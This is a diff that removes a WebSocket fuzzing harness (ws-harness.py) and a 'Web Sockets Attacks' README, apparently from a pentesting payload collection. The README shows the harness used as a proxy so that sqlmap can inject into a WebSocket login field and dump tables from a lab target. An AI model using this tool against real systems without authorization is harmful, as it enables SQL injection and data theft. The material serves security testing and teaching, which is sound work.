Fix name - Part 1

Web Sockets/Files/ws-harness.py

@@ -1,63 +0,0 @@
-#!/usr/bin/python
-import socket,ssl
-from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
-from websocket import create_connection, WebSocket
-from urlparse import parse_qs
-import argparse
-import os
-
-LOOP_BACK_PORT_NUMBER = 8000
-
-def FuzzWebSocket(fuzz_value):
-    print fuzz_value
-    ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
-    result =  ws.recv()
-    return result
-
-def LoadMessage(file):
-    file_contents = ""
-    try:
-        if os.path.isfile(file):
-            f = open(file,'r')
-            file_contents = f.read()
-            f.close()
-    except:
-        print ("Error reading file: %s" % file)
-        exit()
-    return file_contents
-
-class myWebServer(BaseHTTPRequestHandler):
-    
-    #Handler for the GET requests
-    def do_GET(self):
-        qs = parse_qs(self.path[2:])
-        fuzz_value = qs['fuzz']
-        result = FuzzWebSocket(fuzz_value)
-        self.send_response(200)
-        self.send_header('Content-type','text/html')
-        self.end_headers()
-        self.wfile.write(result)
-        return
-
-parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
-parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
-parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
-args = parser.parse_args()
-
-ws_message = LoadMessage(args.message)
-
-ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
-
-try:
-    #Create a web server and define the handler to manage the
-    #incoming request
-    server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
-    print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER
-    
-    #Wait forever for incoming http requests
-    server.serve_forever()
-
-except KeyboardInterrupt:
-    print '^C received, shutting down the web server'
-    server.socket.close()
-    ws.close()

Web Sockets/README.md

@@ -1,37 +0,0 @@
-# Web Sockets Attacks
-
-> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
-
-Tools:
-
-- [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
-
-## Summary
-
-* [Using ws-harness.py](#using-ws-harness-py)
-
-## Using ws-harness.py
-
-Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
-
-```powershell
-python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
-```
-
-The content of the message should contains the **[FUZZ]** keyword.
-
-```json
-{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
-```
-
-Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
-
-```python
-sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
-```
-
-
-## References
-
-- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
-- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)